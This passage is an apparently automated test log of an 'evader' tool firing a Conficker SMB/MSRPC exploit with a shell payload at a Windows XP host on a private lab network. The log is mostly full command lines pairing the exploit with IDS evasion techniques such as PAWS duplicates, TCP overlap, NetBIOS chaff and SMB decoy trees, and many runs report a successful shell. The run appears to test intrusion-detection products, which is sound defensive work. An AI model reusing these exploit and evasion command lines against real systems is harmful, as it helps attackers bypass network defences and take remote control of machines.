  1537. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42180 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=mvJYiHN4XVQ --evasion=[start,msrpc_bind]ipv4_opt,"21","inc","random_alphanum" --evasion=[start,end]tcp_paws,"50%","43541637","random_alphanum" --evasion=[netbios_connect,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  1538. Info: Using random seed mvJYiHN4XVS
  1539. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 43541637> and has random alphanumeric bytes as payload
  1540. The following evasions are applied from stage start to msrpc_bind:
  1541. - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1542. The duplicate packet has random alphanumeric bytes as payload
  1543. The following evasions are applied from stage netbios_connect to msrpc_req:
  1544. - TCP timestamps echo reply value is sent in the wrong endianness
  1545.  
  1546. Info: NetBIOS connection 10.62.90.116:42180 -> 10.35.1.207:445
  1547. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1548. Info: Sending MSRPC request with exploit
  1549. Info: Shell found, attack succeeded
  1550. Info: CommandShell::SendCommand() - Failed to send string
  1551. Info: Command shell connection reset.
  1552. Info: Shell closed
  1553. 0: Success.
  1554. ...
  1555. 2795 runs averaging 2.06 runs / second ; progress: 1354/43200..........
  1556. 2805 runs averaging 2.06 runs / second ; progress: 1359/43200.............
  1557. 2818 runs averaging 2.07 runs / second ; progress: 1364/43200.........2015-06-07 23:42:15 INFO
  1558. Success. (10.62.90.119):
  1559. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29827 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=rSQh8xLHN/Y --evasion=[smb_opentree,msrpc_bind]ipv4_opt,"1","inc","alpharandomized" --evasion=[netbios_connect,msrpc_req]tcp_paws,"25%","67977854","alphanumrandomized" --verifydelay=1000 --payload=shell
  1560. Info: Using random seed rSQh8xLHN/a
  1561. The following evasions are applied from stage netbios_connect to msrpc_req:
  1562. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 67977854> and has original payload with alphanumeric bytes randomized
  1563. The following evasions are applied from stage smb_opentree to msrpc_bind:
  1564. - Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1565. The duplicate packet has identical payload except that alphabetic characters are randomized
  1566.  
  1567. Info: NetBIOS connection 10.62.90.119:29827 -> 10.35.1.207:445
  1568. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1569. Info: Sending MSRPC request with exploit
  1570. Info: Shell found, attack succeeded
  1571. Info: Command shell connection reset.
  1572. Info: CommandShell::SendCommand() - Failed to send string
  1573. Info: Shell closed
  1574. 0: Success.
  1575. ......
  1576. 2834 runs averaging 2.07 runs / second ; progress: 1369/43200...............
  1577. 2849 runs averaging 2.07 runs / second ; progress: 1374/43200...Pid 14369 timed out - killed
  1578. 2015-06-07 23:42:26 INFO
  1579. Timed out (10.62.90.114):
  1580. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60127 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=C5hrHohMDyM --evasion=[smb_connect,end]netbios_chaff,"21","empty_unspec|empty_keepalive|http_get|http_post|msrpc_req|broken_length" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
  1581. Info: Using random seed C5hrHohMDyM
  1582. The following evasions are applied from stage smb_connect to msrpc_bind:
  1583. - 25% probability to add a zero urgent data byte to a TCP segment.
  1584. The following evasions are applied from stage smb_connect to end:
  1585. - Before every 21th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  1586.  
  1587. Info: NetBIOS connection 10.62.90.114:60127 -> 10.35.1.207:445
  1588. Terminated
  1589. ......
  1590. 2859 runs averaging 2.07 runs / second ; progress: 1379/43200.............2015-06-07 23:42:33 INFO
  1591. Success. (10.62.90.118):
  1592. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30054 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=6kx/4FvdT9w --evasion=[smb_connect,msrpc_req]tcp_paws,"1","3","alphanumrandomized" --evasion=[smb_connect,end]tcp_tsoptreply,"le" --evasion=[smb_opentree,smb_openpipe]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  1593. Info: Using random seed 6kx/4FvdT9z
  1594. The following evasions are applied from stage smb_connect to msrpc_req:
  1595. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphanumeric bytes randomized
  1596. The following evasions are applied from stage smb_connect to end:
  1597. - TCP timestamps echo reply value is sent in the wrong endianness
  1598. The following evasions are applied from stage smb_opentree to smb_openpipe:
  1599. - TCP timestamps echo reply value is sent in the wrong endianness
  1600.  
  1601. Info: NetBIOS connection 10.62.90.118:30054 -> 10.35.1.207:445
  1602. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1603. Info: Sending MSRPC request with exploit
  1604. Info: Shell found, attack succeeded
  1605. Info: CommandShell::SendCommand() - Failed to send string
  1606. Info: Command shell connection reset.
  1607. Info: Shell closed
  1608. 0: Success.
  1609.  
  1610. 2873 runs averaging 2.08 runs / second ; progress: 1384/43200............2015-06-07 23:42:38 INFO
  1611. Success. (10.62.90.116):
  1612. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54781 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=O41JLQdTNUg --evasion=[netbios_connect,smb_connect]netbios_chaff,"13","empty_keepalive|http_get|http_post|msrpc_req|broken_length" --evasion=[smb_opentree,end]tcp_paws,"5","264106485","random_alpha" --verifydelay=1000 --payload=shell
  1613. Info: Using random seed O41JLQdTNUg
  1614. The following evasions are applied from stage netbios_connect to smb_connect:
  1615. - Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  1616. The following evasions are applied from stage smb_opentree to end:
  1617. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 264106485> and has random alpha bytes as payload
  1618.  
  1619. Info: NetBIOS connection 10.62.90.116:54781 -> 10.35.1.207:445
  1620. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1621. Info: Sending MSRPC request with exploit
  1622. Info: Shell found, attack succeeded
  1623. Info: Shell closed
  1624. 0: Success.
  1625. ..
  1626. 2888 runs averaging 2.08 runs / second ; progress: 1389/43200.........
  1627. 2897 runs averaging 2.08 runs / second ; progress: 1394/43200.....
  1628. 2902 runs averaging 2.07 runs / second ; progress: 1399/432002015-06-07 23:42:49 INFO
  1629. Success. (10.62.90.114):
  1630. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56654 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=wpR2aE+gKxE --evasion=[smb_connect,end]smb_decoytrees,"6","1","8","random_msrpcreq" --evasion=[netbios_connect,smb_opentree]tcp_urgent,"3","zero" --verifydelay=1000 --payload=shell
  1631. Info: Using random seed wpR2aE+gKxH
  1632. The following evasions are applied from stage netbios_connect to smb_opentree:
  1633. - Add a zero urgent data byte to every 3 TCP segment.
  1634. The following evasions are applied from stage smb_connect to end:
  1635. - Before normal SMB writes, 6 SMB trees are opened and 1 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
  1636.  
  1637. Info: NetBIOS connection 10.62.90.114:56654 -> 10.35.1.207:445
  1638. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1639. Info: Sending MSRPC request with exploit
  1640. Info: Shell found, attack succeeded
  1641. Info: CommandShell::SendCommand() - Failed to send string
  1642. Info: Command shell connection reset.
  1643. Info: Shell closed
  1644. 0: Success.
  1645. .......
  1646. 2910 runs averaging 2.07 runs / second ; progress: 1404/43200..........
  1647. 2920 runs averaging 2.07 runs / second ; progress: 1409/43200.....
  1648. 2925 runs averaging 2.07 runs / second ; progress: 1414/432002015-06-07 23:43:04 INFO
  1649. Success. (10.62.90.111):
  1650. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37265 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=B3brkhsbOQY --evasion=[start,smb_connect]ipv4_opt,"3","inc","alphanumrandomized" --evasion=[start,end]tcp_paws,"50%","161438852","shuffle" --verifydelay=1000 --payload=shell
  1651. Info: Using random seed B3brkhsbOQY
  1652. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 161438852> and has shuffled original payload
  1653. The following evasions are applied from stage start to smb_connect:
  1654. - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1655. The duplicate packet has identical payload except that alphanumeric characters are randomized
  1656.  
  1657. Info: NetBIOS connection 10.62.90.111:37265 -> 10.35.1.207:445
  1658. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1659. Info: Sending MSRPC request with exploit
  1660. Info: Shell found, attack succeeded
  1661. Info: Shell closed
  1662. 0: Success.
  1663. ........
  1664. 2934 runs averaging 2.07 runs / second ; progress: 1419/43200.....
  1665. 2939 runs averaging 2.06 runs / second ; progress: 1424/43200....
  1666. 2943 runs averaging 2.06 runs / second ; progress: 1429/43200...
  1667. 2946 runs averaging 2.05 runs / second ; progress: 1434/43200......
  1668. 2952 runs averaging 2.05 runs / second ; progress: 1439/43200.....
  1669. 2957 runs averaging 2.05 runs / second ; progress: 1444/43200.....
  1670. 2962 runs averaging 2.04 runs / second ; progress: 1449/43200..
  1671. 2964 runs averaging 2.04 runs / second ; progress: 1454/43200
  1672. 2964 runs averaging 2.03 runs / second ; progress: 1459/43200
  1673. 2964 runs averaging 2.02 runs / second ; progress: 1464/43200...Pid 16867 timed out - killed
  1674. 2015-06-07 23:43:56 INFO
  1675. Timed out (10.62.90.115):
  1676. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=32831 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=fbiRe0OqRqE --evasion=[smb_openpipe,end]smb_fnameobf,"change_case|add_paths|add_null_trailer" --evasion=[netbios_connect,msrpc_bind]tcp_overlap,"1480","new","random_alphanum" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
  1677. Info: Using random seed fbiRe0OqRqF
  1678. The following evasions are applied from stage netbios_connect to msrpc_bind:
  1679. - TCP segments are set to overlap by 1480 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
  1680. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  1681. - 75% probability to add a random urgent data byte to a TCP segment.
  1682. The following evasions are applied from stage smb_openpipe to end:
  1683. - The SMB filename is obfuscated:
  1684. * Random characters case is changed
  1685. * Dummy paths are added ( a/b -> a/c/../b )
  1686. * A 0x00 and random alphanumeric characters are appended to the filename
  1687.  
  1688. Info: NetBIOS connection 10.62.90.115:32831 -> 10.35.1.207:445
  1689. Terminated
  1690. ...Pid 16964 timed out - killed
  1691. 2015-06-07 23:43:58 INFO
  1692. Timed out (10.62.90.113):
  1693. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55313 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=b5STQXcaaZU --evasion=[start,smb_opentree]ipv4_opt,"2","inc","random_alphanum" --evasion=[smb_connect,msrpc_bind]netbios_chaff,"8","empty_unspec|http_post|msrpc_req" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
  1694. Info: Using random seed b5STQXcaaZV
  1695. The following evasions are applied from stage start to smb_opentree:
  1696. - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1697. The duplicate packet has random alphanumeric bytes as payload
  1698. The following evasions are applied from stage smb_connect to msrpc_bind:
  1699. - Before every 8th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
  1700. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  1701. - 50% probability to add a zero urgent data byte to a TCP segment.
  1702.  
  1703. Info: NetBIOS connection 10.62.90.113:55313 -> 10.35.1.207:445
  1704. Terminated
  1705. ....
  1706. 2976 runs averaging 2.03 runs / second ; progress: 1469/43200........
  1707. 2984 runs averaging 2.02 runs / second ; progress: 1474/43200......
  1708. 2990 runs averaging 2.02 runs / second ; progress: 1479/43200
  1709. 2990 runs averaging 2.01 runs / second ; progress: 1484/43200.....2015-06-07 23:44:17 INFO
  1710. Success. (10.62.90.115):
  1711. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61219 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=st6VvQtY2WU --evasion=[netbios_connect,end]netbios_chaff,"50%","small_unspec" --evasion=[smb_connect,msrpc_req]tcp_paws,"2","183712702","alphanumrandomized" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"13","random_alpha" --verifydelay=1000 --payload=shell
  1712. Info: Using random seed st6VvQtY2WW
  1713. The following evasions are applied from stage netbios_connect to end:
  1714. - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is a small NetBIOS message of an unspecified type.
  1715. The following evasions are applied from stage smb_connect to msrpc_req:
  1716. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 183712702> and has original payload with alphanumeric bytes randomized
  1717. The following evasions are applied from stage smb_connect to msrpc_bind:
  1718. - Add a random alphaurgent data byte to every 13 TCP segment.
  1719.  
  1720. Info: NetBIOS connection 10.62.90.115:61219 -> 10.35.1.207:445
  1721. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1722. Info: Sending MSRPC request with exploit
  1723. Info: Shell found, attack succeeded
  1724. Info: CommandShell::SendCommand() - Failed to send string
  1725. Info: Command shell connection reset.
  1726. Info: Shell closed
  1727. 0: Success.
  1728. ....
  1729. 3000 runs averaging 2.01 runs / second ; progress: 1489/43200..
  1730. 3002 runs averaging 2.01 runs / second ; progress: 1494/43200.....
  1731. 3007 runs averaging 2.01 runs / second ; progress: 1499/43200.....
  1732. 3012 runs averaging 2.00 runs / second ; progress: 1504/43200..........
  1733. 3022 runs averaging 2.00 runs / second ; progress: 1509/43200....
  1734. 3026 runs averaging 2.00 runs / second ; progress: 1514/43200Pid 17706 timed out - killed
  1735. 2015-06-07 23:44:48 INFO
  1736. Timed out (10.62.90.112):
  1737. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50332 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=baHVccOAqg0 --evasion=[smb_openpipe,msrpc_bind]netbios_chaff,"2","empty_unspec|http_get|http_post|broken_length" --evasion=[smb_openpipe,end]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
  1738. Info: Using random seed baHVccOAqg1
  1739. The following evasions are applied from stage smb_openpipe to end:
  1740. - Add a zero urgent data byte to every 1 TCP segment.
  1741. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  1742. - Before every 2th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  1743.  
  1744. Info: NetBIOS connection 10.62.90.112:50332 -> 10.35.1.207:445
  1745. Terminated
  1746. .
  1747. 3028 runs averaging 1.99 runs / second ; progress: 1519/43200.......
  1748. 3035 runs averaging 1.99 runs / second ; progress: 1524/43200.......2015-06-07 23:44:57 INFO
  1749. Success. (10.62.90.112):
  1750. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20874 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=bDJ7YWEAIoE --evasion=[smb_opentree,smb_openpipe]ipv4_opt,"2","inc","random_alpha" --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","5","random_alphanum" --verifydelay=1000 --payload=shell
  1751. Info: Using random seed bDJ7YWEAIoF
  1752. The following evasions are applied from stage netbios_connect to msrpc_req:
  1753. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alphanumeric bytes as payload
  1754. The following evasions are applied from stage smb_opentree to smb_openpipe:
  1755. - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1756. The duplicate packet has random alphabetic bytes as payload
  1757.  
  1758. Info: NetBIOS connection 10.62.90.112:20874 -> 10.35.1.207:445
  1759. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1760. Info: Sending MSRPC request with exploit
  1761. Info: Shell found, attack succeeded
  1762. Info: Command shell connection reset.
  1763. Info: CommandShell::SendCommand() - Failed to send string
  1764. Info: Shell closed
  1765. 0: Success.
  1766. ....
  1767. 3047 runs averaging 1.99 runs / second ; progress: 1529/43200.........
  1768. 3056 runs averaging 1.99 runs / second ; progress: 1534/43200......
  1769. 3062 runs averaging 1.99 runs / second ; progress: 1539/43200....
  1770. 3066 runs averaging 1.99 runs / second ; progress: 1544/43200..Pid 18133 timed out - killed
  1771. 2015-06-07 23:45:15 INFO
  1772. Timed out (10.62.90.117):
  1773. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55741 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=gZv/c+PGmls --evasion=[msrpc_bind,end]smb_decoytrees,"2","6","900","random" --evasion=[netbios_connect,end]tcp_paws,"8","5","alpharandomized" --verifydelay=1000 --payload=shell
  1774. Info: Using random seed gZv/c+PGmlu
  1775. The following evasions are applied from stage netbios_connect to end:
  1776. - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has original payload with alphabetic bytes randomized
  1777. The following evasions are applied from stage msrpc_bind to end:
  1778. - Before normal SMB writes, 2 SMB trees are opened and 6 writes are performed to them. The write payload is 900 random bytes.
  1779.  
  1780. Info: NetBIOS connection 10.62.90.117:55741 -> 10.35.1.207:445
  1781. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1782. Info: Sending MSRPC request with exploit
  1783. Terminated
  1784. .......2015-06-07 23:45:19 INFO
  1785. Success. (10.62.90.115):
  1786. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18357 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=HyiGiu1DZEU --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"7","1","6","random_msrpcbind" --evasion=[msrpc_bind,msrpc_req]smb_seg,"7" --verifydelay=1000 --payload=shell
  1787. Info: Using random seed HyiGiu1DZEU
  1788. The following evasions are applied from stage msrpc_bind to msrpc_req:
  1789. - Before normal SMB writes, 7 SMB trees are opened and 1 writes are performed to them. The write payload is 6 bytes of MSRPC bind-like data.
  1790. - SMB writes are segmented to contain at most 7 bytes of payload.
  1791.  
  1792. Info: NetBIOS connection 10.62.90.115:18357 -> 10.35.1.207:445
  1793. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1794. Info: Sending MSRPC request with exploit
  1795. Info: Shell found, attack succeeded
  1796. Info: Command shell connection reset.
  1797. Info: CommandShell::SendCommand() - Failed to send string
  1798. Info: Shell closed
  1799. 0: Success.
  1800. .
  1801. 3078 runs averaging 1.99 runs / second ; progress: 1549/43200.
  1802. 3079 runs averaging 1.98 runs / second ; progress: 1554/43200....
  1803. 3083 runs averaging 1.98 runs / second ; progress: 1559/43200..........
  1804. 3093 runs averaging 1.98 runs / second ; progress: 1564/43200......2015-06-07 23:45:39 INFO
  1805. Success. (10.62.90.115):
  1806. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41890 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=pFzCeVGUS4A --evasion=[start,netbios_connect]ipv4_frag,"1128" --evasion=[msrpc_bind,end]smb_decoytrees,"3","3","7","random_msrpcbind" --evasion=[smb_connect,end]tcp_overlap,"5","new","zero" --verifydelay=1000 --payload=shell
  1807. Info: Using random seed pFzCeVGUS4C
  1808. The following evasions are applied from stage start to netbios_connect:
  1809. - IPv4 fragments with at most 1128 bytes per fragment
  1810. The following evasions are applied from stage smb_connect to end:
  1811. - TCP segments are set to overlap by 5 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
  1812. The following evasions are applied from stage msrpc_bind to end:
  1813. - Before normal SMB writes, 3 SMB trees are opened and 3 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.
  1814.  
  1815. Info: NetBIOS connection 10.62.90.115:41890 -> 10.35.1.207:445
  1816. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1817. Info: Sending MSRPC request with exploit
  1818. Info: Shell found, attack succeeded
  1819. Info: Shell closed
  1820. 0: Success.
  1821.  
  1822. 3100 runs averaging 1.98 runs / second ; progress: 1569/43200
  1823. 3100 runs averaging 1.97 runs / second ; progress: 1574/43200..
  1824. 3102 runs averaging 1.96 runs / second ; progress: 1579/43200.........
  1825. 3111 runs averaging 1.96 runs / second ; progress: 1584/43200........
  1826. 3119 runs averaging 1.96 runs / second ; progress: 1589/43200.......
  1827. 3126 runs averaging 1.96 runs / second ; progress: 1594/43200.......
  1828. 3133 runs averaging 1.96 runs / second ; progress: 1599/43200.....
  1829. 3138 runs averaging 1.96 runs / second ; progress: 1604/43200.....
  1830. 3143 runs averaging 1.95 runs / second ; progress: 1609/43200..........
  1831. 3153 runs averaging 1.95 runs / second ; progress: 1614/43200..2015-06-07 23:46:25 INFO
  1832. Success. (10.62.90.113):
  1833. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57851 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=AP1hGMDxKw4 --evasion=[netbios_connect,msrpc_req]ipv4_opt,"5","inc","shuffletcp" --evasion=[netbios_connect,end]tcp_paws,"3","137668711","random_alphanum" --verifydelay=1000 --payload=shell
  1834. Info: Using random seed AP1hGMDxKw4
  1835. The following evasions are applied from stage netbios_connect to msrpc_req:
  1836. - Every 5th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1837. The duplicate packet has shuffled TCP payload
  1838. The following evasions are applied from stage netbios_connect to end:
  1839. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 137668711> and has random alphanumeric bytes as payload
  1840.  
  1841. Info: NetBIOS connection 10.62.90.113:57851 -> 10.35.1.207:445
  1842. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1843. Info: Sending MSRPC request with exploit
  1844. Info: Shell found, attack succeeded
  1845. Info: Shell closed
  1846. 0: Success.
  1847. .....Pid 19636 timed out - killed
  1848. 2015-06-07 23:46:28 INFO
  1849. Timed out (10.62.90.110):
  1850. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50808 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=Jkvm51PzYao --evasion=[smb_opentree,end]ipv4_frag,"1480" --evasion=[netbios_connect,end]ipv4_opt,"13","inc","zero" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
  1851. Info: Using random seed Jkvm51PzYao
  1852. The following evasions are applied from stage netbios_connect to end:
  1853. - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1854. The duplicate packet has NULL bytes for payload
  1855. The following evasions are applied from stage smb_opentree to end:
  1856. - IPv4 fragments with at most 1480 bytes per fragment
  1857. The following evasions are applied from stage smb_openpipe to end:
  1858. - 75% probability to add a random alphaurgent data byte to a TCP segment.
  1859.  
  1860. Info: NetBIOS connection 10.62.90.110:50808 -> 10.35.1.207:445
  1861. Terminated
  1862. ..........
  1863. 3172 runs averaging 1.96 runs / second ; progress: 1619/43200...............
  1864. 3187 runs averaging 1.96 runs / second ; progress: 1625/43200...............
  1865. 3202 runs averaging 1.96 runs / second ; progress: 1630/432002015-06-07 23:46:40 INFO
  1866. Success. (10.62.90.115):
  1867. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42667 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=GOpIKjE2r4Y --evasion=[msrpc_bind,end]smb_decoytrees,"3","6","7","random_msrpcbind" --evasion=[msrpc_bind,end]tcp_segvar,"4","65535" --verifydelay=1000 --payload=shell
  1868. Info: Using random seed GOpIKjE2r4Y
  1869. The following evasions are applied from stage msrpc_bind to end:
  1870. - TCP packets are segmented to contain between 4 and 65535 bytes of payload.
  1871. - Before normal SMB writes, 3 SMB trees are opened and 6 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.
  1872.  
  1873. Info: NetBIOS connection 10.62.90.115:42667 -> 10.35.1.207:445
  1874. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1875. Info: Sending MSRPC request with exploit
  1876. Info: Shell found, attack succeeded
  1877. Info: Shell closed
  1878. 0: Success.
  1879. .........
  1880. 3212 runs averaging 1.96 runs / second ; progress: 1635/43200........
  1881. 3220 runs averaging 1.96 runs / second ; progress: 1640/43200.............
  1882. 3233 runs averaging 1.97 runs / second ; progress: 1645/43200............2015-06-07 23:46:59 INFO
  1883. Success. (10.62.90.115):
  1884. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30995 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=eLhPcn+y9o4 --evasion=[start,end]tcp_paws,"21","122513006","shuffle30" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","268435454","random_alphanum" --verifydelay=1000 --payload=shell
  1885. Info: Using random seed eLhPcn+y9o5
  1886. - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 122513006> and has 30 bytes of original payload, then shuffled original payload
  1887. The following evasions are applied from stage smb_opentree to msrpc_req:
  1888. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload
  1889.  
  1890. Info: NetBIOS connection 10.62.90.115:30995 -> 10.35.1.207:445
  1891. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1892. Info: Sending MSRPC request with exploit
  1893. Info: Shell found, attack succeeded
  1894. Info: Shell closed
  1895. 0: Success.
  1896. ..
  1897. 3248 runs averaging 1.97 runs / second ; progress: 1650/43200..............
  1898. 3262 runs averaging 1.97 runs / second ; progress: 1655/43200..............
  1899. 3276 runs averaging 1.97 runs / second ; progress: 1660/43200...........
  1900. 3287 runs averaging 1.97 runs / second ; progress: 1665/43200.......
  1901. 3294 runs averaging 1.97 runs / second ; progress: 1670/43200...
  1902. 3297 runs averaging 1.97 runs / second ; progress: 1675/43200.......
  1903. 3304 runs averaging 1.97 runs / second ; progress: 1680/43200........
